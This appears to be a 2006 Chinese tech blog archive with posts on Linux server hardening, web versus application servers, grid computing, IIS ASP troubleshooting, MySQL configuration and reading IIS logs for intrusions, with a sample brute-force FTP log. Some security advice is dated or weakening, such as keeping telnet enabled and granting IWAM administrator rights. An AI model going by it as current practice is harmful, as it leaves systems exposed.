由于NFS服务器漏洞比较多,你一定要小心。如果要使用NFS网络文件系统服务,那么确保你的/etc/exports具有最严格的存取权限设置,不意味着不要使用任何通配符,不允许root写权限,mount成只读文件系统。你可以编辑文件/etc/exports并且加:
/dir/to/export host1.mydomain.com(ro,root_squash)
/dir/to/export host2.mydomain.com(ro,root_squash)
其中/dir/to/export 是你想输出的目录,host.mydomain.com是登录这个目录的机器名,ro意味着mount成只读系统,root_squash禁止root写入该目录。最后为了让上面的改变生效,还要运行/usr/sbin/exportfs -a
关于开启的服务
默认的linux就是一个强大的系统,运行了很多的服务。但有许多服务是不需要的,很容易引起安全风险。这个文件就是/etc/inetd.conf,它制定了/usr/sbin/inetd将要监听的服务,你可能只需要其中的两个:telnet和ftp,其它的类如shell, login, exec, talk, ntalk, imap, pop-2, pop-3, finger, auth, etc. 除非你真的想用它。否则统统关闭之。
你先用下面的命令显示没有被注释掉的服务:
grep -v “#” /etc/inetd.conf
这个命令统计面前服务的总数:
ps -eaf|wc -l
需要提醒你的是以下三个服务漏洞很多,强烈建议你关闭它们:S34yppasswdd(NIS服务器)、S35ypserv(NIS服务器)和S60nfs(NFS服务器)。
我们可以运行#killall -HUP inetd来关闭不需要的服务。当然,你也可以运行
#chattr +i /etc/inetd.conf
如果你想使inetd.conf文件具有不可更改属性,而只有root 才能解开,敲以下命令
#chattr -i /etc/inetd.conf
当你关闭一些服务以后,重新运行以上命令看看少了多少服务。运行的服务越少,系统自然
越安全了。我们可以用下面命令察看哪些服务在运行:
netstat -na –ip
如果你用的是Redhat那就方便多了。^_^ Redhat提供一个工具来帮助你关闭服务,输入/usr/sbin/setup,然后选择”system services”,就可以定制系统启动时跑哪些服务。另外一个选择是chkconfig命令,很多linux版本的系统都自带这个工具。脚本名字中的数字是启动的顺序,以大写的K开头的是杀死进程用的。
关于日志
所有的日志都在/var/log下(仅对linux系统而言),默认情况下linux的日志就已经很强大了,但除ftp外。因此我们可以通过修改/etc/ftpaccess 或者/etc/inetd.conf,来保证每一个ftp连接日志都能够纪录下来。下面是一个修改inetd.conf的例子,假如有下一行:
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -L -i -o
注释:
-l每一个ftp连接都写到syslog
-L纪录用户的每一个命令
-i文件received,纪录到xferlog
-o文件transmitted,记录到xferlog
不过你也不要太相信日志,因为绝大部分黑客都有“擦脚印”的“好”习惯啰!如果你不放心,最好安装一个Sniffer吧。
关于TCP_WRAPPERS
默认的,Redhat Linux允许所有的请求,这是很危险的。如果用TCP_WRAPPERS来增强我们站点的安全性简直是举手之劳,你可以将禁止所有的请求放入“ALL: ALL”到/etc/hosts.deny中,然后放那些明确允许的请求到/etc/hosts.allow中,如:
sshd: 192.168.1.10/255.255.255.0 gate.openarch.com
对IP地址192.168.1.10和主机名gate.openarch.com,允许通过ssh连接。配置完了之后,用tcpdchk检查,你可以直接执行:tcpdchk 。在这里,tcpchk是TCP_Wrapper配置检查工具,它检查你的tcp wrapper配置并报告所有发现的潜在/存在的问题。
关于补丁
你应该经常到你所安装的Linux系统发行商的主页上去找最新的补丁。例如:对于Redhat系统而言可以在:http://www.redhat.com/corp/support/errata/上找到补丁。幸运的是,在Redhat6.1以后的版本带有一个自动升级工具up2date,它能自动够测定哪些rpm包需要升级,然后自动从Redhat的站点下载并完成安装。这对某些懒惰的管理员来说,可是个省精神的福音哦!^_^
分类 : 技术文摘 | 发表时间 21-04-2006
Web服务器(Web Server)
Web服务器可以解析(handles)HTTP协议。当Web服务器接收到一个HTTP请求(request),会返回一个HTTP响应 (response),例如送回一个HTML页面。为了处理一个请求(request),Web服务器可以响应(response)一个静态页面或图片,进行页面跳转(redirect),或者把动态响应(dynamic response)的产生委托(delegate)给一些其它的程序例如CGI脚本,JSP(JavaServer Pages)脚本,servlets,ASP(Active Server Pages)脚本,服务器端(server-side)JavaScript,或者一些其它的服务器端(server-side)技术。无论它们(译者注:脚本)的目的如何,这些服务器端(server-side)的程序通常产生一个HTML的响应(response)来让浏览器可以浏览。
要知道,Web服务器的代理模型(delegation model)非常简单。当一个请求(request)被送到Web服务器里来时,它只单纯的把请求(request)传递给可以很好的处理请求 (request)的程序(译者注:服务器端脚本)。Web服务器仅仅提供一个可以执行服务器端(server-side)程序和返回(程序所产生的)响应(response)的环境,而不会超出职能范围。服务器端(server-side)程序通常具有事务处理(transaction processing),数据库连接(database connectivity)和消息(messaging)等功能。
虽然Web服务器不支持事务处理或数据库连接池,但它可以配置(employ)各种策略(strategies)来实现容错性(fault tolerance)和可扩展性(scalability),例如负载平衡(load balancing),缓冲(caching)。集群特征(clustering—features)经常被误认为仅仅是应用程序服务器专有的特征。
应用程序服务器(The Application Server)
根据我们的定义,作为应用程序服务器,它通过各种协议,可以包括HTTP,把商业逻辑暴露给(expose)客户端应用程序。Web服务器主要是处理向浏览器发送HTML以供浏览,而应用程序服务器提供访问商业逻辑的途径以供客户端应用程序使用。应用程序使用此商业逻辑就象你调用对象的一个方法 (或过程语言中的一个函数)一样。
应用程序服务器的客户端(包含有图形用户界面(GUI)的)可能会运行在一台PC、一个Web服务器或者甚至是其它的应用程序服务器上。在应用程序服务器与其客户端之间来回穿梭(traveling)的信息不仅仅局限于简单的显示标记。相反,这种信息就是程序逻辑(program logic)。正是由于这种逻辑取得了(takes)数据和方法调用(calls)的形式而不是静态HTML,所以客户端才可以随心所欲的使用这种被暴露的商业逻辑。
在大多数情形下,应用程序服务器是通过组件(component)的应用程序接口(API)把商业逻辑暴露(expose)(给客户端应用程序)的,例如基于J2EE(Java 2 Platform, Enterprise Edition)应用程序服务器的EJB(Enterprise JavaBean)组件模型。此外,应用程序服务器可以管理自己的资源,例如看大门的工作(gate-keeping duties)包括安全(security),事务处理(transaction processing),资源池(resource pooling),和消息(messaging)。就象Web服务器一样,应用程序服务器配置了多种可扩展(scalability)和容错(fault tolerance)技术。
一个例子
例如,设想一个在线商店(网站)提供实时定价(real-time pricing)和有效性(availability)信息。这个站点(site)很可能会提供一个表单(form)让你来选择产品。当你提交查询 (query)后,网站会进行查找(lookup)并把结果内嵌在HTML页面中返回。网站可以有很多种方式来实现这种功能。我要介绍一个不使用应用程序服务器的情景和一个使用应用程序服务器的情景。观察一下这两中情景的不同会有助于你了解应用程序服务器的功能。
情景1:不带应用程序服务器的Web服务器
在此种情景下,一个Web服务器独立提供在线商店的功能。Web服务器获得你的请求(request),然后发送给服务器端(server- side)可以处理请求(request)的程序。此程序从数据库或文本文件(flat file,译者注:flat file是指没有特殊格式的非二进制的文件,如properties和XML文件等)中查找定价信息。一旦找到,服务器端(server-side)程序把结果信息表示成(formulate)HTML形式,最后Web服务器把会它发送到你的Web浏览器。
简而言之,Web服务器只是简单的通过响应(response)HTML页面来处理HTTP请求(request)。
情景2:带应用程序服务器的Web服务器
情景2和情景1相同的是Web服务器还是把响应(response)的产生委托(delegates)给脚本(译者注:服务器端(server -side)程序)。然而,你可以把查找定价的商业逻辑(business logic)放到应用程序服务器上。由于这种变化,此脚本只是简单的调用应用程序服务器的查找服务(lookup service),而不是已经知道如何查找数据然后表示为(formulate)一个响应(response)。这时当该脚本程序产生HTML响应(response)时就可以使用该服务的返回结果了。
在此情景中,应用程序服务器提供(serves)了用于查询产品的定价信息的商业逻辑。(服务器的)这种功能(functionality)没有指出有关显示和客户端如何使用此信息的细节,相反客户端和应用程序服务器只是来回传送数据。当有客户端调用应用程序服务器的查找服务(lookup service)时,此服务只是简单的查找并返回结果给客户端。
通过从响应产生(response-generating)HTML的代码中分离出来,在应用程序之中该定价(查找)逻辑的可重用性更强了。其他的客户端,例如收款机,也可以调用同样的服务(service)来作为一个店员给客户结帐。相反,在情景1中的定价查找服务是不可重用的因为信息内嵌在 HTML页中了。
总而言之,在情景2的模型中,在Web服务器通过回应HTML页面来处理HTTP请求(request),而应用程序服务器则是通过处理定价和有效性(availability)请求(request)来提供应用程序逻辑的。
警告(Caveats)
现在,XML Web Services已经使应用程序服务器和Web服务器的界线混淆了。通过传送一个XML有效载荷(payload)给服务器,Web服务器现在可以处理数据和响应(response)的能力与以前的应用程序服务器同样多了。
另外,现在大多数应用程序服务器也包含了Web服务器,这就意味着可以把Web服务器当作是应用程序服务器的一个子集(subset)。虽然应用程序服务器包含了Web服务器的功能,但是开发者很少把应用程序服务器部署(deploy)成这种功能(capacity)(译者注:这种功能是指既有应用程序服务器的功能又有Web服务器的功能)。相反,如果需要,他们通常会把Web服务器独立配置,和应用程序服务器一前一后。这种功能的分离有助于提高性能(简单的Web请求(request)就不会影响应用程序服务器了),分开配置(专门的Web服务器,集群(clustering)等等),而且给最佳产品的选取留有余地。
分类 : 业界动态 | 发表时间 21-04-2006
网格(Grid)被誉为继Internet和Web之后的第三次信息技术浪潮。网格与Web的主要区别是,Web是对HTML文件的一致访问,而网格是对重要资源柔性的、高性能的访问,即时地创建强大的虚拟计算系统。
实际上,网格是利用互联网把地理上广泛分布的各种资源(包括计算资源、存储资源、带宽资源、软件资源、数据资源、信息资源、知识资源等)连成一个逻辑整体,就像一台超级计算机一样,为用户提供一体化信息和应用服务(计算、存储、访问等),虚拟组织最终实现在这个虚拟环境下进行资源共享和协同工作,彻底消除资源“孤岛”,让人们使用网格上的资源像用电一样简单。
由“点”到“网”
“网格计算”(Grid Computing)使人们可以轻而易举地为一些大型科研任务,创建和使用动态、分布式、高性能的计算环境。而这些在以前是不可能实现的,或开展起来所付出的代价很高,如高能物理数据分析、气候建模、宇宙观测、实时遥感数据处理、虚拟现实等;它也可以在商业计算领域应用,如联机分析处理、数据挖掘、商业智能等。此外,它还可以广泛地应用在电子商务、电子政务等领域。
网格计算使人们能够共享计算、存储、数据和应用资源。这种计算模式是利用互联网把分散在不同地理位置的计算机组织成一个“虚拟的超级计算机”,其中每台参与计算的计算机就是一个“节点”,而整个计算是由成千上万个“节点”组成的“一张网格”。
Web与网格融合
网格有别于Web的基本特征就在于服务的形式。目前,Web要创建应用环境,还要靠开发人员按照Web协议开发,而网格是在更高层次上对这些应用提供的一种服务形式。因此,将来的应用系统所基于的平台,应该是网格所提供的基本服务。而这种服务的本身,又会不断动态地加入到网格当中,使得网格服务内容不断丰富。
目前,网格计算技术之所以能够引起社会如此广泛的讨论,主要原因是网格能够通过网络利用众多闲置的CPU资源形成高性能的计算能力。但是遇到的问题是,现有的大量商业应用软件和数据库软件都不支持网格技术,这就是现实与理想的差距。
对网格计算的发展来说,目前相当重要的一项工作就是建立一个通用的网格服务标准规范,把网格计算与目前的Web服务能够很好地融合。
锁定商务应用服务
由IBM、Sun和Microsoft倡导的全球Grid论坛(Global Grid Forum),把目标锁定在把网格计算技术与Web服务计算结合起来提供商务应用服务,从而将网格计算技术从科学计算领域引入到商务应用领域,并引发了IBM、Sun和Microsoft采取行动,将网格计算与Web服务相结合,实现一种使业务交易在分布于Internet服务器上运行的技术。
在全球Grid论坛上,Globus工具包开放源码小组(主要成员是Argonne国家实验室、芝加哥大学和南加州大学)和IBM公司共同倡导开放式网格服务体系结构(Open Grid Services Architecture,OGSA)。
倡导OGSA
OGSA是在Globus网格计算工具包和Web服务技术融合的基础上提出的一套规范和标准。OGSA将与服务器版Java、Web服务以及商业数据库紧密集成,实现网格计算在商务领域的广泛应用。
OGSA采用纤维层、连接层、资源层、协作层、应用层五层结构。其中,纤维层是为网格协议仲裁的共享访问提供各种资源,如计算资源、存储系统、数据目录等物理资源。连接层定义网格特定的网络处理所需的核心通信协议和安全认证协议。资源层建立在连接层的通信与认证协议基础之上,是对个人资源安全共享操作的谈判、启动、监视、控制、记账和支付定义协议、API和SDK。协作层包含的协议、服务、APIs 和SDKs ,与任何特定资源无关,而是全局性和跨资源集合的一种捕获交互,最后在应用层通过调用“服务”来构造应用。
OGSA吸纳了许多Web服务标准,如Web服务描述语言(WSDL)、简单对象访问协议(SOAP)、目录访问协议(LDAP)、Web服务探测(WS-Inspection)等。这些标准用于定位、调度计算资源,并保证它们的安全。
Web服务架构OGSA
OGSA采用Web服务框架具有两项优点:一方面,通过注册和发现接口定义和终端(Endpoint),实现描述以及动态产生特定接口绑定的代理,在异构环境中能够支持服务的动态发现与合成;另一方面,由于Web服务机制在商业应用领域广泛被采用,OGSA采用Web服务框架,使人们能够利用许多现有的开发工具和扩展服务,如产生语言绑定的WSDL处理器。
OGSA从Web服务的标准接口定义了多协议绑定、多个实现(Multiple Implementations)、本地/远程透明机制。OGSA网格服务模型包括一些具有代表性的持久服务和许多潜在的短暂服务,所有服务遵循特定的网格服务接口和行为。
从电子商务发展角度来看,Web服务提供基于XML的组件式开放标准化软件,而网格计算则满足了海量商业数据分析(如在客户关系管理中的数据挖掘)所需的CPU资源要求。因此,Web服务技术与网格计算技术的融合,是把Internet作为商业计算平台,推进电子商务进一步发展的利器,将极大地改变传统电子商务开发和运营模式。
融合赢得多方技术支持
Microsoft曾表示将加入到推广网格计算技术的行列中,希望Globus工具包可以支持Windows XP操作系统及其Web服务解决方案.NET。
为对抗Microsoft的.NET,以提供服务收取费用方式代替一次买断产品的经营模式,IBM决定将网格技术应用拓展到商用计算领域。IBM希望以网格计算技术、OS/2操作系统及WebSphere平台软件,打造出可提供与.NET类似的服务环境。同时,IBM表示WebSphere、Tivoli管理软件、服务器和内存系统以及服务器硬件设备都将支持网格技术。
为了给企业提供网格计算的强大工具,Sun发布了针对网格计算和Web服务全面集成的软件平台——技术计算门户。技术计算门户解决方案由iPlanet Portal、Grid Engine和Sun ONE构成,提供了在网格环境下密集计算、在Sun ONE环境下数据存储,以及通过基于Web的图形用户界面(即网络门户)来访问这些数据的能力,以满足企业的各种业务需求,并使企业获得更高的效率和投资回报率。Sun新的网格计算/Web服务解决方案将为群集计算环境和校园网格环境,甚至全球网格(Great Global Grid)环境注入活力。
分类 : 网站技术 | 发表时间 20-04-2006
原文出处:http://www.iisfaq.com/Default.aspx?tabid=3094
整理翻译:ajou
1.如果WEB站点目录下有Global.asa文件,改此文件文件名为Global.old.重启WEB服务,在记事本中写如下代码(原文中无代码,实际最简单的那种asp源码就行,译者注).文件另存为Test.asp于WEB根目录下.
如果asp文件能正常执行,问题就出在Global.asa上,如果依然不行,请转到第二步.
参阅如下微软知识库有关Global.asa文件出错的更多信息.
Q288245 PRB: Global.asa Does Not Fire from Personal Web Server on Windows 98
Q265275 FP2000: Global.asa Does Not Run in FrontPage Web
Q173742 FIX: Global.asa Is Not Executed If Restricting Web Access
2.将web站点的应用程序保护级别设置为”低”,重启IISAdmin服务.如果asp文件如此能正常执行,说明问题出在IWAM用户上,请跳到第三步继续.如果没有正常执行,请在管理工具中检查组件服务确保能看到IIS Packages,确保组件服务没有失败后,确认本地用户组中有如下用户存在:
NT AUTHORITY\Authenticated Users
NT AUTHORITY\INTERACTIVE
关于更多组件服务出错的信息,请参考入下知识文章:
Q301919 PRB: Cannot Expand ‘My Computer’ in Component Services MMC Snap-In
3.如果通过第二步asp文件能正常执行,将站点的应用程序保护级别设回”中”或”高”,将IWAM用户添加到本地管理员用户组中,如果通过这步,asp文件能正常执行,说明IWAM用户的访问许可权限就存在问题,请跳到第四步,如果asp文件还没正常执行,请在命令提示符中执行Synciwam.vbs 工具.
方法:打开命令提示符窗口敲入如下命令:
C:\Inetpub\adminscripts>cscript synciwam.vbs.
关于IWAM用户(设置不正确)导致asp文件不能正常执行,请参考入下知识库.
Q308622 HOW TO: Perform Administration Tasks in IIS from a Command Prompt
Q297989 PRB: Configured Identity Is Incorrect for IWAM Account
Q255770 PRB: Logon Failure: Unknown User Name or Bad Password When You Run Out-of-Process Webs
Q236007 Domain Controller Demotion Causes Out-of-Process Applications to Fail
4.解决IWAM用户许可权限的问题,请使用windows 2000的第三方产品:Regmon 和 Filemon.请在http://www.sysinternals.com中下载这些工具.
当你执行asp页面请求时运行这些工具, Dllhost.exe 进程在Regmon 中查找”ACCDENIED” (在Filemon中查找”FAILURE”).
注意:在IE进程出现”操作失败”时不要紧张,这只是普通现象.~~
关于IIS功能正常运作所需的最小条件,请参阅知识库:
Q271071 Minimum NTFS Permissions Required for IIS 5.0 to Work
在看到Dllhost.exe 进程”操作失败”的错误信息后,用Regedit32工具修改注册表里任何必须的NTFS许可权限(好像是病句,,汗…)
5.在装完IIS5.0后,从WEB 服务器控制台或其他网络上的工作站浏览asp或html文件,WEB服务可能返回如下错误信息:
HTTP 500 内部服务器错误.
默认的web服务可能处于运行状态,如果运行netstat -an 你可能注意到WEB服务器正监听TCP80端口,即HTTP的默认端口.
注意:如果在使用IE5.0(或以上版本,译者注),你可能屏蔽了IE高级选项中的显示友好HTTP错误信息选项,更多信息:请参考微软知识库:
Q218155 Description of Hypertext Transport Protocol Error Messages
下面的几条可能出现在装有IIS5.0机器的事件日志中:
Application Log: COM+ error with Event ID 4099
System Log: W3SVC error with Event ID 59
System Log: W3SVC warning with Event ID 36.
Iis5.log 文件(WINNT目录下)可能包含下面错误信息:
0x8004e00f=COM+ was unable to talk to the Microsoft Distributed Transaction Coordinator
你正试图打开com+管理者使用的组件服务,MMC停止响应.
原因
IIS5.0依赖与COM+,COM+依赖于Distributed Transaction Coordinator (DTC) 服务运行,DTC检查版本的机制(包括在windows 2000以前的SQL SERVER版本)不能识别Windows2000所用的版本属性,结果SQL SERVER的DTC安装程序移除了WINDOWS 2000安装的DTC服务,更多请查阅微软知识库:
Q249310 BUG: Installing SQL Server on Windows 2000 Uninstalls DTC Service
解决
如下步骤解决这个问题:
a.验证Dtcsetup.exe (默认在c:\Winnt\System32 下)是否为1999.9.3422.24 或以后版本号
b.运行Dtcsetup.exe 安装DTC服务
c.开始DTC服务
d.控制面板中,双击”添加删除程序”
e.选”添加删除Windows组件”,移除IIS5.0再重新安装.
现状
微软已经确认在SQL Server versions 6.5 和 7.0 and MSDE 1.0中这会是个问题
详细请参见文章:
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q257267
6.最后一招:依照下面步骤自己创建IIS Packages
a.浏览组件服务删除下列包
a.IIS In-Process Applications
b.IIS Out-of-Process Pooled Applications
c.IIS Utilities
b.打开命令提示符,转到文件夹%windir%\system32\inetsrv,执行命令:
rundll32 wamreg.dll, CreateIISPackage
注意:CreateIISPackage是大小写敏感的,确人输入正确.
c.重新打开组件服务,你将看到IIS COM+应用已经重新创建了.
d.从命令提示符中运行IISRESTART再测试之前没有正确执行的任何asp文件.
分类 : 技术文摘 | 发表时间 17-04-2006
在安装mysql解压包时虽然安装成功但在WINDOW自动启动时无法加载MYSQL服务,通过在网上不断的找资料还有自己的实践终于搞定,希望对遇到这要问题的朋友有点作用,
如何让MYSQL服务进程中自动加载MYSQL
1.在 开始--》运行中执行 c:\mysql\bin\mysqld-nt -install (卸载时执行-uninstall)
2.把c:/mysql/my-medium.ini改名为my.ini并修改里面的相关配置拷到c:/winnt 或c:/winnts c:/windows 下
3.然后在开始--》运行 中执行 net start|stop|restart mysql
下面在本地机上采用安装的方式生成的my.ini
[注:要根据自己的实际情况修改相应的参数即可]
# MySQL Server Instance Configuration File
# ———————————————————————-
# Generated by the MySQL Server Instance Configuration Wizard
#
#
# Installation Instructions
# ———————————————————————-
#
# On Linux you can copy this file to /etc/my.cnf to set global options,
# mysql-data-dir/my.cnf to set server-specific options
# (@localstatedir@ for this installation) or to
# ~/.my.cnf to set user-specific options.
#
# On Windows you should keep this file in the installation directory
# of your server (e.g. C:\Program Files\MySQL\MySQL Server 4.1). To
# make sure the server reads the config file use the startup option
# “–defaults-file”.
#
# To run run the server from the command line, execute this in a
# command line shell, e.g.
# mysqld –defaults-file=”C:\Program Files\MySQL\MySQL Server 4.1\my.ini”
#
# To install the server as a Windows service manually, execute this in a
# command line shell, e.g.
# mysqld –install MySQL41 –defaults-file=”C:\Program Files\MySQL\MySQL Server 4.1\my.ini”
#
# And then execute this in a command line shell to start the server, e.g.
# net start MySQL41
#
#
# Guildlines for editing this file
# ———————————————————————-
#
# In this file, you can use all long options that the program supports.
# If you want to know the options a program supports, start the program
# with the “–help” option.
#
# More detailed information about the individual options can also be
# found in the manual.
#
#
# CLIENT SECTION
# ———————————————————————-
#
# The following options will be read by MySQL client applications.
# Note that only client applications shipped by MySQL are guaranteed
# to read this section. If you want your own MySQL client program to
# honor these values, you need to specify it as an option during the
# MySQL client library initialization.
#
[client]
port=3306
[mysql]
default-character-set=latin1
# SERVER SECTION
# ———————————————————————-
#
# The following options will be read by the MySQL Server. Make sure that
# you have installed the server correctly (see above) so it reads this
# file.
#
[mysqld]
# The TCP/IP Port the MySQL Server will listen on
port=3306
#Path to installation directory. All paths are usually resolved relative to this.
basedir=”C:/Program Files/MySQL/MySQL Server 5.0/”
#Path to the database root
datadir=”C:/Program Files/MySQL/MySQL Server 5.0/Data/”
# The default character set that will be used when a new schema or table is
# created and no character set is defined
default-character-set=latin1
# The default storage engine that will be used when create new tables when
default-storage-engine=INNODB
# Set the SQL mode to strict
sql-mode=”STRICT_TRANS_TABLES,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION”
# The maximum amount of concurrent sessions the MySQL server will
# allow. One of these connections will be reserved for a user with
# SUPER privileges to allow the administrator to login even if the
# connection limit has been reached.
max_connections=100
# Query cache is used to cache SELECT results and later return them
# without actual executing the same query once again. Having the query
# cache enabled may result in significant speed improvements, if your
# have a lot of identical queries and rarely changing tables. See the
# “Qcache_lowmem_prunes” status variable to check if the current value
# is high enough for your load.
# Note: In case your tables change very often or if your queries are
# textually different every time, the query cache may result in a
# slowdown instead of a performance improvement.
query_cache_size=0
# The number of open tables for all threads. Increasing this value
# increases the number of file descriptors that mysqld requires.
# Therefore you have to make sure to set the amount of open files
# allowed to at least 4096 in the variable “open-files-limit” in
# section [mysqld_safe]
table_cache=256
# Maximum size for internal (in-memory) temporary tables. If a table
# grows larger than this value, it is automatically converted to disk
# based table This limitation is for a single table. There can be many
# of them.
tmp_table_size=5M
# How many threads we should keep in a cache for reuse. When a client
# disconnects, the client’s threads are put in the cache if there aren’t
# more than thread_cache_size threads from before. This greatly reduces
# the amount of thread creations needed if you have a lot of new
# connections. (Normally this doesn’t give a notable performance
# improvement if you have a good thread implementation.)
thread_cache_size=8
#*** MyISAM Specific options
# The maximum size of the temporary file MySQL is allowed to use while
# recreating the index (during REPAIR, ALTER TABLE or LOAD DATA INFILE.
# If the file-size would be bigger than this, the index will be created
# through the key cache (which is slower).
myisam_max_sort_file_size=100G
# If the temporary file used for fast index creation would be bigger
# than using the key cache by the amount specified here, then prefer the
# key cache method. This is mainly used to force long character keys in
# large tables to use the slower key cache method to create the index.
myisam_max_extra_sort_file_size=100G
# If the temporary file used for fast index creation would be bigger
# than using the key cache by the amount specified here, then prefer the
# key cache method. This is mainly used to force long character keys in
# large tables to use the slower key cache method to create the index.
myisam_sort_buffer_size=8M
# Size of the Key Buffer, used to cache index blocks for MyISAM tables.
# Do not set it larger than 30% of your available memory, as some memory
# is also required by the OS to cache rows. Even if you’re not using
# MyISAM tables, you should still set it to 8-64M as it will also be
# used for internal temporary disk tables.
key_buffer_size=8M
# Size of the buffer used for doing full table scans of MyISAM tables.
# Allocated per thread, if a full scan is needed.
read_buffer_size=64K
read_rnd_buffer_size=256K
# This buffer is allocated when MySQL needs to rebuild the index in
# REPAIR, OPTIMZE, ALTER table statements as well as in LOAD DATA INFILE
# into an empty table. It is allocated per thread so be careful with
# large settings.
sort_buffer_size=212K
#*** INNODB Specific options ***
# Use this option if you have a MySQL server with InnoDB support enabled
# but you do not plan to use it. This will save memory and disk space
# and speed up some things.
#skip-innodb
# Additional memory pool
that is used by InnoDB to store metadata
# information. If InnoDB requires more memory for this purpose it will
# start to allocate it from the OS. As this is fast enough on most
# recent operating systems, you normally do not need to change this
# value. SHOW INNODB STATUS will display the current amount used.
innodb_additional_mem_pool_size=2M
# If set to 1, InnoDB will flush (fsync) the transaction logs to the
# disk at each commit, which offers full ACID behavior. If you are
# willing to compromise this safety, and you are running small
# transactions, you may set this to 0 or 2 to reduce disk I/O to the
# logs. Value 0 means that the log is only written to the log file and
# the log file flushed to disk approximately once per second. Value 2
# means the log is written to the log file at each commit, but the log
# file is only flushed to disk approximately once per second.
innodb_flush_log_at_trx_commit=1
# The size of the buffer InnoDB uses for buffering log data. As soon as
# it is full, InnoDB will have to flush it to disk. As it is flushed
# once per second anyway, it does not make sense to have it very large
# (even with long transactions).
innodb_log_buffer_size=1M
# InnoDB, unlike MyISAM, uses a buffer pool to cache both indexes and
# row data. The bigger you set this the less disk I/O is needed to
# access data in tables. On a dedicated database server you may set this
# parameter up to 80% of the machine physical memory size. Do not set it
# too large, though, because competition of the physical memory may
# cause paging in the operating system. Note that on 32bit systems you
# might be limited to 2-3.5G of user level memory per process, so do not
# set it too high.
innodb_buffer_pool_size=8M
# Size of each log file in a log group. You should set the combined size
# of log files to about 25%-100% of your buffer pool size to avoid
# unneeded buffer pool flush activity on log file overwrite. However,
# note that a larger logfile size will increase the time needed for the
# recovery process.
innodb_log_file_size=10M
# Number of threads allowed inside the InnoDB kernel. The optimal value
# depends highly on the application, hardware as well as the OS
# scheduler properties. A too high value may lead to thread thrashing.
innodb_thread_concurrency=8
分类 : 系统安全 | 发表时间 16-04-2006
如今各式各样的Windows漏洞层出不穷,五花八门的入侵工具更是令人眼花缭乱,稍微懂点网络知识的人都可以利用各种入侵工具进行入侵,这可给我们的网管带来了很大的麻烦,虽然经过精心配置的服务器可以抵御大部分入侵,但随着不断新出的漏洞,再高明的网管也不敢保证一台务器长时间不会被侵入,所以,安全配置服务器并不能永远阻止黑客入侵,而如何检测入侵者行动以保证服务器安全性就在这样的情况下显得非常重要。
日志文件作为微软Windows系列操作系统中的一个特殊文件,在安全方面具有无可替代的价值。它每天为我们忠实地记录下系统所发生一切事件,利用它可以使系统管理员快速对潜在的系统入侵作出记录和预测,但遗憾的是目前绝大多数的人都忽略了它的存在,反而是因为黑客们光临才会使我们想起这个重要的系统日志文件,很有讽刺意味。
在这里我们就不去讲什么日志文件的默认位置、常见备份方法等基本技巧了,这样的东西黑防以前讲得很清楚了,大家可以翻看黑防以前的杂志学习这些东西,我们今天来看看如何分析常见的日志文件吧!
1.FTP日志分析
FTP日志和WWW日志在默认情况下,每天生成一个日志文件,包含了该日的一切记录,文件名通常为ex(年份)(月份)(日期)。例如ex040419,就是2004年4月19日产生的日志,用记事本可直接打开,普通的有入侵行为的日志一般是这样的:
#Software: Microsoft Internet Information Services 5.0(微软IIS5.0)
#Version: 1.0 (版本1.0)
#Date: 20040419 0315 (服务启动时间日期)
#Fields: time cip csmethod csuristem scstatus
0315 127.0.0.1 [1]USER administator 331(IP地址为127.0.0.1用户名为administator试图登录)
0318 127.0.0.1 [1]PASS – 530(登录失败)
032:04 127.0.0.1 [1]USER nt 331(IP地址为127.0.0.1用户名为nt的用户试图登录)
032:06 127.0.0.1 [1]PASS – 530(登录失败)
032:09 127.0.0.1 [1]USER cyz 331(IP地址为127.0.0.1用户名为cyz的用户试图登录)
0322 127.0.0.1 [1]PASS – 530(登录失败)
0322 127.0.0.1 [1]USER administrator 331(IP地址为127.0.0.1用户名为administrator试图登录)
0324 127.0.0.1 [1]PASS – 230(登录成功)
0321 127.0.0.1 [1]MKD nt 550(新建目录失败)
0325 127.0.0.1 [1]QUIT – 550(退出FTP程序)
从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统,换了四次用户名和密码才成功,管理员立即就可以得知这个IP至少有入侵企图!而他的入侵时间、IP地址以及探测的用户名都很清楚的记录在日志上。如上例入侵者最终是用Administrator用户名进入的,那么就要考虑此用户名是不是密码失窃?还是被别人利用?接下来就要想想系统出什么问题了。
2.WWW日志分析
WWW服务同FTP服务一样,产生的日志也是在%systemroot%\sys tem32\LogFiles\W3SVC1目录下,默认是每天一个日志文件。这里需要特别说明一下,因为Web的日志和其他日志不同,它的分析要细致得多,需要管理员有丰富的入侵、防护知识,并且要足够的细心,不然,很容易遗漏那种很简单的日志,而通常这样的日志又是非常关键的。由于我们不可能一个一个分析,所以这里举个简单例子:
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 20040419 03:091
#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)
20040419 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
20040419 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
通过分析第六行,可以看出2004年5月19日,IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口,查看了一个页面iisstart.asp,这位用户的浏览器为compatible;+MSIE+5.0;+Windows+98+DigExt,有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间。
对现在非常常见的SQL注入式攻击,通过对put、get的检查,也可以大概判断是那个页面出了问题,从而修补。
3.HTTPD事务日志的分析
Microsoft的IIS 5自公布到现在,被黑客利用的漏洞多不胜数,像.ida/.idq、unicode、WebDavx3和一些未知的漏洞,我们分析日志的目的就是为了分析黑客入侵的行为,对于没有打好补丁包的系统被黑客成功入侵的日志记录分别对应如下。为了给大家介绍一个比较醒目的介绍,专门配置了个“古老”的服务器,用旧漏洞给大家做个演示,很容易触类旁通就懂其它了。
(1)unicode漏洞入侵日志记录
这个是个非常经典的漏洞了,要找这样的服务器估计得去国外慢慢找了,但是因为它的日志是最经典的一个,所以我们这里特别拿它来做个示范。
我们打开IIS5的Web服务的日志文件,日志文件默认位置在%systemroot%\system32\LogFiles\文件夹下,如图1所示是一个典型的Unicode漏洞入侵行为的日志记录,对于正常的Web访问,是通过80端口用GET命令获取Web数据,但通过非法的字符编码可绕过字符验证而得到不应该得到的信息。但补上相应的补丁可堵上此漏洞。如图一所示。
